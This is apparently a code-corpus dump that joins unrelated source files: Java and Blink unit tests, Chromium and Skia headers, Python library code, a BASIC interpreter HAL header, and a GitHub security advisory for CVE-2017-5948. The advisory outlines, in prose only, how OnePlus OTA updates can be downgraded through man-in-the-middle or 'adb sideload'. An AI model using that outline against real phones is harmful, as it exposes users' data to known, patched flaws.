Class<?> clazz = classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
assertSame("Unexpected class returned", testResult, clazz);
verify(classCache).getCachedClass(TEST_CLASS_LOOKUP_NAME);
verifyZeroInteractions(classLoadersCollection);
}
@Test
public void testRetrieveClassShouldCheckClassForNameSecond() {
Class<?> clazz = classStorageService.retrieveClass(Object.class.getName());
assertSame("Unexpected class returned", Object.class, clazz);
verify(classCache).getCachedClass(Object.class.getName());
verifyZeroInteractions(classLoadersCollection);
}
@Test
public void testRetrieveClassShouldCheckClassLoadersCollectionThird() throws ClassNotFoundException {
Class<?> testResult = Object.class;
ClassLoader mockedClassLoader = mock(ClassLoader.class);
Mockito.<Class<?>>when(mockedClassLoader.loadClass(TEST_CLASS_LOOKUP_NAME)).thenReturn(testResult);
when(classLoadersCollection.getClassLoadersCollection()).thenReturn(Collections.singleton(mockedClassLoader));
Class<?> clazz = classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
assertSame("Unexpected class returned", testResult, clazz);
verify(mockedClassLoader).loadClass(TEST_CLASS_LOOKUP_NAME);
}
@Test
public void testRetrieveClassShouldCheckClassLoadersCollectionAndContinueToNextClassLoaderWithoutCrash() throws ClassNotFoundException {
Class<?> testResult = Object.class;
ClassLoader mockedClassLoaderWithoutClass = mock(ClassLoader.class);
ClassLoader mockedClassLoaderWithClass = mock(ClassLoader.class);
Mockito.<Class<?>>when(mockedClassLoaderWithClass.loadClass(TEST_CLASS_LOOKUP_NAME)).thenReturn(testResult);
when(classLoadersCollection.getClassLoadersCollection()).thenReturn(Arrays.asList(mockedClassLoaderWithoutClass, mockedClassLoaderWithClass));
Class<?> clazz = classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
assertSame("Unexpected class returned", testResult, clazz);
verify(mockedClassLoaderWithoutClass).loadClass(TEST_CLASS_LOOKUP_NAME);
verify(mockedClassLoaderWithClass).loadClass(TEST_CLASS_LOOKUP_NAME);
}
@Test
public void testRetrieveClassShouldThrowExceptionIfClassIsNotFound() {
try {
classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
fail();
} catch (LookedUpClassNotFound e) {
assertEquals("Unexpected exception message", "Class \"" + TEST_CLASS_LOOKUP_NAME + "\" not found.", e.getMessage());
}
}
@Test
public void storeClass() {
Class<?> storedClass = Object.class;
classStorageService.storeClass(TEST_CLASS_LOOKUP_NAME, storedClass);
verify(classCache).addClass(TEST_CLASS_LOOKUP_NAME, storedClass);
verify(classLoadersCollection).addClassLoader(storedClass.getClassLoader());
}
}
| 1,569
|
2,151
|
/*
* Copyright 2016 Google Inc.
*
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
#ifndef SKSL_FLOATLITERAL
#define SKSL_FLOATLITERAL
#include "SkSLContext.h"
#include "SkSLExpression.h"
namespace SkSL {
/**
* A literal floating point number.
*/
struct FloatLiteral : public Expression {
FloatLiteral(const Context& context, int offset, double value,
const Type* type = nullptr)
: INHERITED(offset, kFloatLiteral_Kind, type ? *type : *context.fFloat_Type)
, fValue(value) {}
String description() const override {
return to_string(fValue);
}
bool hasSideEffects() const override {
return false;
}
bool isConstant() const override {
return true;
}
bool compareConstant(const Context& context, const Expression& other) const override {
FloatLiteral& f = (FloatLiteral&) other;
return fValue == f.fValue;
}
double getConstantFloat() const override {
return fValue;
}
const double fValue;
typedef Expression INHERITED;
};
} // namespace
#endif
| 425
|
892
|
<filename>advisories/unreviewed/2022/05/GHSA-54jw-4xpp-q62p/GHSA-54jw-4xpp-q62p.json
{
"schema_version": "1.2.0",
"id": "GHSA-54jw-4xpp-q62p",
"modified": "2022-05-13T01:46:21Z",
"published": "2022-05-13T01:46:21Z",
"aliases": [
"CVE-2017-5948"
],
"details": "An issue was discovered on OnePlus One, X, 2, 3, and 3T devices. OxygenOS and HydrogenOS are vulnerable to downgrade attacks. This is due to a lenient 'updater-script' in OTAs that does not check that the current version is lower than or equal to the given image's. Downgrades can occur even on locked bootloaders and without triggering a factory reset, allowing for exploitation of now-patched vulnerabilities with access to user data. This vulnerability can be exploited by a Man-in-the-Middle (MiTM) attacker targeting the update process. This is possible because the update transaction does not occur over TLS (CVE-2016-10370). In addition, a physical attacker can reboot the phone into recovery, and then use 'adb sideload' to push the OTA (on OnePlus 3/3T 'Secure Start-up' must be off).",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5948"
},
{
"type": "WEB",
"url": "https://alephsecurity.com/vulns/aleph-2017008"
}
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"severity": "MODERATE",
"github_reviewed": false
}
}
| 617
|
1,630
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import torch.distributed as dist
from colossalai.global_variables import tensor_parallel_env as env
from colossalai.registry import DIST_GROUP_INITIALIZER
from ..parallel_mode import ParallelMode
from .process_group_initializer import ProcessGroupInitializer
@DIST_GROUP_INITIALIZER.register_module
class Initializer_1D(ProcessGroupInitializer):
"""A ProcessGroupInitializer for 1d tensor parallelism.
Args:
rank (int): The rank of current process.
world_size (int): Size of whole communication world.
config (Config): Running configuration.
data_parallel_size (int): Size of data parallel.
pipeline_parallel_size (int): Size of pipeline parallel.
tensor_parallel_size (int): Size of tensor parallel.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.num_group = self.world_size // self.tensor_parallel_size
def init_dist_group(self):
"""Initialize 1D tensor parallel groups, and assign local_ranks and groups to each gpu.
Returns:
Tuple (local_rank, group_world_size, process_group, ranks_in_group, mode):
1D tensor parallelism's information in a tuple.
"""
local_rank = None
ranks_in_group = None
process_group = None
cpu_group = None
group_world_size = None
mode = ParallelMode.PARALLEL_1D
env.parallel_input_1d = False
for i in range(self.num_group):
ranks = [i * self.tensor_parallel_size + j for j in range(self.tensor_parallel_size)]
group = dist.new_group(ranks)
group_cpu = dist.new_group(ranks, backend='gloo') if dist.get_backend() != 'gloo' else group
if self.rank in ranks:
local_rank = ranks.index(self.rank)
group_world_size = len(ranks)
process_group = group
cpu_group = group_cpu
ranks_in_group = ranks
return local_rank, group_world_size, process_group, cpu_group, ranks_in_group, mode
| 883
|
376
|
<filename>lecture02/src/test/java/ru/atom/geometry/BarPointCollisionTest.java<gh_stars>100-1000
package ru.atom.geometry;
import org.junit.Ignore;
import org.junit.Test;
import static junit.framework.TestCase.assertTrue;
import static org.junit.Assert.assertFalse;
@Ignore
public class BarPointCollisionTest {
@Test
public void pointInsideBar() {
Collider bar = Geometry.createBar(0, 0, 100, 100);
Collider point = Geometry.createPoint(50, 50);
assertTrue(bar.isColliding(point));
}
@Test
public void pointOnCornerOfBar() {
Collider bar = Geometry.createBar(0, 0, 100, 100);
Collider point = Geometry.createPoint(0, 0);
assertTrue(bar.isColliding(point));
}
@Test
public void pointOnBorderOfBar() {
Collider bar = Geometry.createBar(0, 0, 100, 100);
Collider point = Geometry.createPoint(0, 50);
assertTrue(bar.isColliding(point));
}
@Test
public void pointOutsideOfBar1() {
Collider bar = Geometry.createBar(0, 0, 100, 100);
Collider point = Geometry.createPoint(0, 150);
assertFalse(bar.isColliding(point));
}
@Test
public void pointOutsideOfBar2() {
Collider bar = Geometry.createBar(0, 0, 100, 100);
Collider point = Geometry.createPoint(150, 0);
assertFalse(bar.isColliding(point));
}
@Test
public void pointOutsideOfBar3() {
Collider bar = Geometry.createBar(0, 0, 100, 100);
Collider point = Geometry.createPoint(150, 150);
assertFalse(bar.isColliding(point));
}
}
| 643
|
777
|
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef COMPONENTS_OMNIBOX_BROWSER_CLIPBOARD_URL_PROVIDER_H_
#define COMPONENTS_OMNIBOX_BROWSER_CLIPBOARD_URL_PROVIDER_H_
#include "base/macros.h"
#include "components/omnibox/browser/autocomplete_provider.h"
#include "components/omnibox/browser/history_url_provider.h"
class AutocompleteProviderClient;
class ClipboardRecentContent;
class HistoryURLProvider;
// Autocomplete provider offering content based on the clipboard's content.
class ClipboardURLProvider : public AutocompleteProvider {
public:
ClipboardURLProvider(AutocompleteProviderClient* client,
HistoryURLProvider* history_url_provider,
ClipboardRecentContent* clipboard_content);
// AutocompleteProvider implementation.
void Start(const AutocompleteInput& input, bool minimal_changes) override;
private:
~ClipboardURLProvider() override;
AutocompleteProviderClient* client_;
ClipboardRecentContent* clipboard_content_;
// Used for efficiency when creating the verbatim match. Can be NULL.
HistoryURLProvider* history_url_provider_;
DISALLOW_COPY_AND_ASSIGN(ClipboardURLProvider);
};
#endif // COMPONENTS_OMNIBOX_BROWSER_CLIPBOARD_URL_PROVIDER_H_
| 443
|
14,668
|
<gh_stars>1000+
// Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROMECAST_METRICS_METRICS_UTIL_H_
#define CHROMECAST_METRICS_METRICS_UTIL_H_
#include "net/base/ip_address.h"
namespace chromecast {
// Pack last two bytes of IPv4 or IPv6 address into value used for logging
// partial sender IP fragments (e.g. discovery code and virtual connection
// details). If the address is empty or not valid IPv4/IPv6 then zeros will
// be filled into the packed fragment.
uint32_t GetIPAddressFragmentForLogging(const net::IPAddressBytes& sender_ip);
} // namespace chromecast
#endif // CHROMECAST_METRICS_METRICS_UTIL_H_
| 239
|
799
|
<filename>pyowm/airpollutionapi30/coindex.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pyowm.commons import exceptions
from pyowm.utils import formatting, timestamps
from pyowm.weatherapi25 import location
class COIndex:
"""
A class representing the Carbon monOxide Index observed in a certain location
in the world. The index is made up of several measurements, each one at a
different atmospheric pressure. The location is represented by the
encapsulated *Location* object.
:param reference_time: GMT UNIXtime telling when the CO data has been measured
:type reference_time: int
:param location: the *Location* relative to this CO observation
:type location: *Location*
:param interval: the time granularity of the CO observation
:type interval: str
:param co_samples: the CO samples
:type co_samples: list of dicts
:param reception_time: GMT UNIXtime telling when the CO observation has
been received from the OWM Weather API
:type reception_time: int
:returns: an *COIndex* instance
:raises: *ValueError* when negative values are provided as reception time,
CO samples are not provided in a list
"""
def __init__(self, reference_time, location, interval, co_samples,
reception_time):
if reference_time < 0:
raise ValueError("'reference_time' must be greater than 0")
self.ref_time = reference_time
self.location = location
self.interval = interval
if not isinstance(co_samples, list):
raise ValueError("'co_samples' must be a list")
self.co_samples = sorted(co_samples, key=lambda k: k['value'], reverse=True)
if reception_time < 0:
raise ValueError("'reception_time' must be greater than 0")
self.rec_time = reception_time
def reference_time(self, timeformat='unix'):
"""
Returns the GMT time telling when the CO samples have been measured
:param timeformat: the format for the time value. May be:
'*unix*' (default) for UNIX time
'*iso*' for ISO8601-formatted string in the format ``YYYY-MM-DD HH:MM:SS+00:00``
'*date* for ``datetime.datetime`` object instance
:type timeformat: str
:returns: an int or a str
:raises: ValueError when negative values are provided
"""
return formatting.timeformat(self.ref_time, timeformat)
def reception_time(self, timeformat='unix'):
"""
Returns the GMT time telling when the CO observation has been received
from the OWM Weather API
:param timeformat: the format for the time value. May be:
'*unix*' (default) for UNIX time
'*iso*' for ISO8601-formatted string in the format ``YYYY-MM-DD HH:MM:SS+00:00``
'*date* for ``datetime.datetime`` object instance
:type timeformat: str
:returns: an int or a str
:raises: ValueError when negative values are provided
"""
return formatting.timeformat(self.rec_time, timeformat)
def sample_with_highest_vmr(self):
"""
Returns the CO sample with the highest Volume Mixing Ratio value
:return: dict
"""
return max(self.co_samples, key=lambda x: x['value'])
def sample_with_lowest_vmr(self):
"""
Returns the CO sample with the lowest Volume Mixing Ratio value
:return: dict
"""
return min(self.co_samples, key=lambda x: x['value'])
def is_forecast(self):
"""
Tells if the current CO observation refers to the future with respect
to the current date
:return: bool
"""
return timestamps.now(timeformat='unix') < \
self.reference_time(timeformat='unix')
@classmethod
def from_dict(cls, the_dict):
"""
Parses a *COIndex* instance out of a data dictionary. Only certain properties of the data dictionary
are used: if these properties are not found or cannot be parsed, an exception is issued.
:param the_dict: the input dictionary
:type the_dict: `dict`
:returns: a *COIndex* instance or ``None`` if no data is available
:raises: *ParseAPIResponseError* if it is impossible to find or parse the data needed to build the result
"""
if the_dict is None:
raise exceptions.ParseAPIResponseError('Data is None')
try:
# -- reference time (strip away Z and T on ISO8601 format)
t = the_dict['time'].replace('Z', '+00:00').replace('T', ' ')
reference_time = formatting.ISO8601_to_UNIXtime(t)
# -- reception time (now)
reception_time = timestamps.now('unix')
# -- location
lon = float(the_dict['location']['longitude'])
lat = float(the_dict['location']['latitude'])
place = location.Location(None, lon, lat, None)
# -- CO samples
co_samples = the_dict['data']
except KeyError:
raise exceptions.ParseAPIResponseError(
''.join([__name__, ': impossible to parse COIndex']))
return COIndex(reference_time, place, None, co_samples, reception_time)
def to_dict(self):
"""Dumps object to a dictionary
:returns: a `dict`
"""
return {"reference_time": self.ref_time,
"location": self.location.to_dict(),
"interval": self.interval,
"co_samples": self.co_samples,
"reception_time": self.rec_time}
def __repr__(self):
return "<%s.%s - reference time=%s, reception time=%s, location=%s, " \
"interval=%s>" % (
__name__,
self.__class__.__name__,
self.reference_time('iso'),
self.reception_time('iso'),
str(self.location),
self.interval)
| 2,505
|
3,913
|
package cn.iocoder.yudao.framework;
| 15
|
326
|
package com.nilhcem.hostseditor.task;
import android.content.Context;
import android.os.AsyncTask;
import com.nilhcem.hostseditor.HostsEditorApplication;
import com.nilhcem.hostseditor.R;
import com.nilhcem.hostseditor.core.Host;
import com.nilhcem.hostseditor.core.HostsManager;
import com.nilhcem.hostseditor.event.LoadingEvent;
import com.nilhcem.hostseditor.event.RefreshHostsEvent;
import com.squareup.otto.Bus;
import java.util.ArrayList;
import java.util.List;
import javax.inject.Inject;
/**
* AsyncTask that gets all valid hosts and triggers a {@code RefreshHostEvent} event.
*/
public class ListHostsAsync extends AsyncTask<Boolean, Void, List<Host>> {
@Inject Bus mBus;
@Inject HostsManager mHostsManager;
public ListHostsAsync(Context context) {
HostsEditorApplication.get(context).component().inject(this);
}
@Override
protected void onPreExecute() {
super.onPreExecute();
mBus.post(new LoadingEvent(true, R.string.loading_hosts));
}
@Override
protected List<Host> doInBackground(Boolean... params) {
Boolean forceRefresh = params[0];
if (forceRefresh == null) {
forceRefresh = false;
}
List<Host> allHosts = mHostsManager.getHosts(forceRefresh);
// Filter to get only valid hosts
List<Host> validHosts = new ArrayList<>();
for (Host host : allHosts) {
if (host.isValid()) {
validHosts.add(host);
}
}
return validHosts;
}
@Override
protected void onPostExecute(List<Host> result) {
super.onPostExecute(result);
mBus.post(new RefreshHostsEvent(result));
}
}
| 691
|
575
|
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "third_party/blink/renderer/core/page/focus_controller.h"
#include <memory>
#include "testing/gtest/include/gtest/gtest.h"
#include "third_party/blink/public/mojom/input/focus_type.mojom-blink.h"
#include "third_party/blink/renderer/bindings/core/v8/v8_binding_for_core.h"
#include "third_party/blink/renderer/core/dom/shadow_root.h"
#include "third_party/blink/renderer/core/html/html_element.h"
#include "third_party/blink/renderer/core/testing/page_test_base.h"
namespace blink {
class FocusControllerTest : public PageTestBase {
private:
void SetUp() override { PageTestBase::SetUp(IntSize()); }
};
TEST_F(FocusControllerTest, SetInitialFocus) {
GetDocument().body()->setInnerHTML("<input><textarea>");
auto* input = To<Element>(GetDocument().body()->firstChild());
// Set sequential focus navigation point before the initial focus.
input->focus();
input->blur();
GetFocusController().SetInitialFocus(mojom::blink::FocusType::kForward);
EXPECT_EQ(input, GetDocument().FocusedElement())
<< "We should ignore sequential focus navigation starting point in "
"setInitialFocus().";
}
TEST_F(FocusControllerTest, DoNotCrash1) {
GetDocument().body()->setInnerHTML(
"<div id='host'></div>This test is for crbug.com/609012<p id='target' "
"tabindex='0'></p>");
// <div> with shadow root
auto* host = To<Element>(GetDocument().body()->firstChild());
host->AttachShadowRootInternal(ShadowRootType::kOpen);
// "This test is for crbug.com/609012"
Node* text = host->nextSibling();
// <p>
auto* target = To<Element>(text->nextSibling());
// Set sequential focus navigation point at text node.
GetDocument().SetSequentialFocusNavigationStartingPoint(text);
GetFocusController().AdvanceFocus(mojom::blink::FocusType::kForward);
EXPECT_EQ(target, GetDocument().FocusedElement())
<< "This should not hit assertion and finish properly.";
}
TEST_F(FocusControllerTest, DoNotCrash2) {
GetDocument().body()->setInnerHTML(
"<p id='target' tabindex='0'></p>This test is for crbug.com/609012<div "
"id='host'></div>");
// <p>
auto* target = To<Element>(GetDocument().body()->firstChild());
// "This test is for crbug.com/609012"
Node* text = target->nextSibling();
// <div> with shadow root
auto* host = To<Element>(text->nextSibling());
host->AttachShadowRootInternal(ShadowRootType::kOpen);
// Set sequential focus navigation point at text node.
GetDocument().SetSequentialFocusNavigationStartingPoint(text);
GetFocusController().AdvanceFocus(mojom::blink::FocusType::kBackward);
EXPECT_EQ(target, GetDocument().FocusedElement())
<< "This should not hit assertion and finish properly.";
}
TEST_F(FocusControllerTest, SetActiveOnInactiveDocument) {
// Test for crbug.com/700334
GetDocument().Shutdown();
// Document::shutdown() detaches document from its frame, and thus
// document().page() becomes nullptr.
// Use DummyPageHolder's page to retrieve FocusController.
GetPage().GetFocusController().SetActive(true);
}
// This test is for crbug.com/733218
TEST_F(FocusControllerTest, SVGFocusableElementInForm) {
GetDocument().body()->setInnerHTML(
"<form>"
"<input id='first'>"
"<svg width='100px' height='100px' tabindex='0'>"
"<circle cx='50' cy='50' r='30' />"
"</svg>"
"<input id='last'>"
"</form>");
auto* form = To<Element>(GetDocument().body()->firstChild());
auto* first = To<Element>(form->firstChild());
auto* last = To<Element>(form->lastChild());
Element* next = GetFocusController().NextFocusableElementInForm(
first, mojom::blink::FocusType::kForward);
EXPECT_EQ(next, last)
<< "SVG Element should be skipped even when focusable in form.";
Element* prev = GetFocusController().NextFocusableElementInForm(
next, mojom::blink::FocusType::kBackward);
EXPECT_EQ(prev, first)
<< "SVG Element should be skipped even when focusable in form.";
}
TEST_F(FocusControllerTest, FindFocusableAfterElement) {
GetDocument().body()->setInnerHTML(
"<input id='first'><div id='second'></div><input id='third'><div "
"id='fourth' tabindex='0'></div>");
Element* first = GetElementById("first");
Element* second = GetElementById("second");
Element* third = GetElementById("third");
Element* fourth = GetElementById("fourth");
EXPECT_EQ(third, GetFocusController().FindFocusableElementAfter(
*first, mojom::blink::FocusType::kForward));
EXPECT_EQ(third, GetFocusController().FindFocusableElementAfter(
*second, mojom::blink::FocusType::kForward));
EXPECT_EQ(fourth, GetFocusController().FindFocusableElementAfter(
*third, mojom::blink::FocusType::kForward));
EXPECT_EQ(nullptr, GetFocusController().FindFocusableElementAfter(
*fourth, mojom::blink::FocusType::kForward));
EXPECT_EQ(nullptr, GetFocusController().FindFocusableElementAfter(
*first, mojom::blink::FocusType::kBackward));
EXPECT_EQ(first, GetFocusController().FindFocusableElementAfter(
*second, mojom::blink::FocusType::kBackward));
EXPECT_EQ(first, GetFocusController().FindFocusableElementAfter(
*third, mojom::blink::FocusType::kBackward));
EXPECT_EQ(third, GetFocusController().FindFocusableElementAfter(
*fourth, mojom::blink::FocusType::kBackward));
EXPECT_EQ(nullptr, GetFocusController().FindFocusableElementAfter(
*first, mojom::blink::FocusType::kNone));
}
} // namespace blink
| 2,080
|
336
|
<reponame>idrnyu/LA104
/*
* Terminal-BASIC is a lightweight BASIC-like language interpreter
*
* Copyright (C) 2016-2018 <NAME> <<EMAIL>>
* Copyright (C) 2019,2020 Terminal-BASIC team
* <https://bitbucket.org/%7Bf50d6fee-8627-4ce4-848d-829168eedae5%7D/>
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef HAL_H
#define HAL_H
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include "sys/cdefs.h"
#include "tools.h"
#include "HAL_config.h"
__BEGIN_DECLS
/**
* @brief Initialize hardware interface
*/
void HAL_initialize();
/**
* @brief finalize hardware interface
*/
void HAL_finalize();
/**
* @brief Regular update platform state
*/
void HAL_update();
/*** Non volatile RAM interface ***/
#if HAL_NVRAM
/**
* @address
*/
typedef uint32_t HAL_nvram_address_t;
/**
* @brief Get NVRAM size
* @return
*/
HAL_nvram_address_t HAL_nvram_getsize();
/**
* @brief write byte to NVRAM
* @param address [in]
* @param dataByte [in]
*/
void HAL_nvram_write(HAL_nvram_address_t, uint8_t);
/**
* @brief read byte from NVRAM
* @param address
* @return byte
*/
uint8_t HAL_nvram_read(HAL_nvram_address_t);
/**
*
* @param address
* @param buf
* @param length
*/
void HAL_nvram_read_buf(HAL_nvram_address_t, void*, uint32_t);
/**
*
* @param address
* @param buf
* @param length
*/
void HAL_nvram_write_buf(HAL_nvram_address_t, const void*, uint32_t);
#endif /* HAL_NVRAM */
/*** Terminal interface ***/
typedef uint8_t HAL_terminal_t;
/**
* @param termno
* @param byte
*/
void HAL_terminal_write(HAL_terminal_t, uint8_t);
/**
* @param termno
* @return byte
*/
uint8_t HAL_terminal_read(HAL_terminal_t);
/**
* @parram termno
* @return number of bytes, ready to read
*/
BOOLEAN HAL_terminal_isdataready(HAL_terminal_t);
/*** External memory interface ***/
#if HAL_EXTMEM
/**
* File handle
*/
typedef uint8_t HAL_extmem_file_t;
/**
* Position in file/file size
*/
typedef uint32_t HAL_extmem_fileposition_t;
/**
* @brief Open file in external memory
* @param path
* @return file handle > 0 or 0 on error
*/
HAL_extmem_file_t HAL_extmem_openfile(const char[13]);
/**
* @brief Delete file from external memory
* @param path
*/
void HAL_extmem_deletefile(const char[13]);
/**
* @brief close opened file
* @param handle
*/
void HAL_extmem_closefile(HAL_extmem_file_t);
/**
* @brief Read byte from file
* @param handle
* @return byte
*/
uint8_t HAL_extmem_readfromfile(HAL_extmem_file_t);
/**
* @brief Write byte to file
* @param handle
* @param byte
*/
void HAL_extmem_writetofile(HAL_extmem_file_t, uint8_t);
/**
* @brief
* @param handle
* @return position
*/
HAL_extmem_fileposition_t HAL_extmem_getfileposition(HAL_extmem_file_t);
/**
* @brief Set position in file
* @param handle
* @param position
*/
void HAL_extmem_setfileposition(HAL_extmem_file_t, HAL_extmem_fileposition_t);
/**
* @brief handle
* @param handle
* @return file size
*/
HAL_extmem_fileposition_t HAL_extmem_getfilesize(HAL_extmem_file_t);
/**
* @brief
* @return
*/
uint32_t HAL_extmem_getfreespace();
/**
* @brief Get number of
* @return number of files
*/
uint16_t HAL_extmem_getnumfiles();
/**
* @brief Get file name in a directory
* @param num [in] entry number
* @param name [out]
*/
void HAL_extmem_getfilename(uint16_t, char[13]);
/**
* @brief
* @param fname
* @return
*/
BOOLEAN HAL_extmem_fileExists(const char[13]);
#endif /* HAL_EXTMEM */
/*** Time interface ***/
/**
* @brief Delay for aa interval
* @param ms milliseconds [in]
*/
void HAL_time_sleep_ms(uint32_t);
/**
* @brief get current time from system start
* @return time in milliseconds
*/
uint32_t HAL_time_gettime_ms();
/*** Random number interface ***/
void HAL_random_seed(uint32_t);
uint32_t HAL_random_generate(uint32_t);
#if HAL_GFX
typedef enum {
HAL_GFX_NOTACOLOR = 0,
HAL_GFX_COLOR_WHITE,
HAL_GFX_COLOR_BLACK,
HAL_GFX_COLOR_RED,
HAL_GFX_COLOR_GREEN,
HAL_GFX_COLOR_BLUE,
HAL_GFX_COLOR_CYAN,
HAL_GFX_COLOR_MAGENTA,
HAL_GFX_COLOR_YELLOW,
HAL_GFX_COLOR_GRAY,
HAL_GFX_NUMCOLORS
} HAL_gfx_color_t;
/**
* @param fgcolor
*/
void HAL_gfx_setColor(HAL_gfx_color_t);
/**
* @param bgcolor
*/
void HAL_gfx_setBgColor(HAL_gfx_color_t);
/**
* @param fgColor
* @param bgColor
*/
void HAL_gfx_setColors(HAL_gfx_color_t, HAL_gfx_color_t);
/**
* @param x
* @param y
*/
void HAL_gfx_point(uint16_t, uint16_t);
/**
* @param x
* @param y
* @param color
*/
void HAL_gfx_pointc(uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x1
* @param y1
* @param x2
* @param y2
*/
void HAL_gfx_line(uint16_t, uint16_t, uint16_t, uint16_t);
/**
* @param x1
* @param y1
* @param x2
* @param y2
* @param color
*/
void HAL_gfx_linec(uint16_t, uint16_t, uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x
* @param y
* @param w
* @param h
*/
void HAL_gfx_rect(uint16_t, uint16_t, uint16_t, uint16_t);
/**
* @param x
* @param y
* @param w
* @param h
* @param color
*/
void HAL_gfx_rectc(uint16_t, uint16_t, uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x
* @param y
*/
void HAL_gfx_lineto(uint16_t, uint16_t);
/**
* @param x
* @param y
* @param color
*/
void HAL_gfx_linetoc(uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x
* @param y
* @param r
*/
void HAL_gfx_circle(uint16_t, uint16_t, uint16_t);
/**
* @param x
* @param y
* @param r
* @param color
*/
void HAL_gfx_circlec(uint16_t, uint16_t, uint16_t, HAL_gfx_color_t);
#endif /* HAL_GFX */
#if HAL_GPIO
/**
* @brief write pin value
*/
void HAL_gpio_writePin(uint8_t, BOOLEAN);
/**
* @brief read pin value
*/
BOOLEAN HAL_gpio_readPin(uint8_t);
#endif /* HAL_GPIO */
#if HAL_BUZZER
/**
* @brief
*
* @param ch channel
* @param freq Frequency (HZ)
* @param dur duration (ms) 0 - endless
*/
void HAL_buzzer_tone(uint8_t, uint16_t, uint16_t);
/**
*
*/
void HAL_buzzer_notone(uint8_t);
#endif /* HAL_BUZZER */
__END_DECLS
#endif /* HAL_H */
| 2,649
|
388
|
<filename>aws/kinesis/core/kinesis_record.h
/*
* Copyright 2019 Amazon.com, Inc. or its affiliates.
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef AWS_KINESIS_CORE_KINESIS_RECORD_H_
#define AWS_KINESIS_CORE_KINESIS_RECORD_H_
#include <unordered_map>
#include <aws/kinesis/protobuf/messages.pb.h>
#include <aws/kinesis/core/serializable_container.h>
#include <aws/kinesis/core/user_record.h>
namespace aws {
namespace kinesis {
namespace core {
namespace detail {
class KeySet {
public:
std::pair<bool, uint32_t> add(const std::string& s);
bool empty() const;
void clear();
std::pair<bool, uint32_t> remove_one(const std::string& d);
const std::string& first() const;
private:
std::vector<std::string> keys_;
std::unordered_map<std::string, uint32_t> lookup_;
std::unordered_map<std::string, size_t> counts_;
};
} // namespace detail
class KinesisRecord : public SerializableContainer<UserRecord> {
public:
static constexpr const char* kMagic = "\xF3\x89\x9A\xC2";
KinesisRecord();
size_t accurate_size() override;
size_t estimated_size() override;
std::string serialize() override;
std::string partition_key() const;
std::string explicit_hash_key() const;
protected:
void after_add(const std::shared_ptr<UserRecord>& ur) override;
void after_remove(const std::shared_ptr<UserRecord>& ur) override;
void after_clear() override;
private:
static const size_t kFixedOverhead = 4 + 16;
aws::kinesis::protobuf::AggregatedRecord aggregated_record_;
detail::KeySet explicit_hash_keys_;
detail::KeySet partition_keys_;
size_t estimated_size_;
size_t cached_accurate_size_;
bool cached_accurate_size_valid_;
};
} //namespace core
} //namespace kinesis
} //namespace aws
#endif //AWS_KINESIS_CORE_KINESIS_RECORD_H_
| 782
|
392
|
<gh_stars>100-1000
package com.platform.service;
import com.platform.dao.ApiAdMapper;
import com.platform.entity.AdVo;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
import java.util.Map;
@Service
public class ApiAdService {
@Autowired
private ApiAdMapper adDao;
public AdVo queryObject(Integer id) {
return adDao.queryObject(id);
}
public List<AdVo> queryList(Map<String, Object> map) {
return adDao.queryList(map);
}
public int queryTotal(Map<String, Object> map) {
return adDao.queryTotal(map);
}
public void save(AdVo brand) {
adDao.save(brand);
}
public void update(AdVo brand) {
adDao.update(brand);
}
public void delete(Integer id) {
adDao.delete(id);
}
public void deleteBatch(Integer[] ids) {
adDao.deleteBatch(ids);
}
}
| 400
|
6,717
|
//******************************************************************************
//
// Copyright (c) 2016 Intel Corporation. All rights reserved.
// Copyright (c) Microsoft. All rights reserved.
//
// This code is licensed under the MIT License (MIT).
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
//******************************************************************************
#pragma once
#import <CoreGraphics/CGGradient.h>
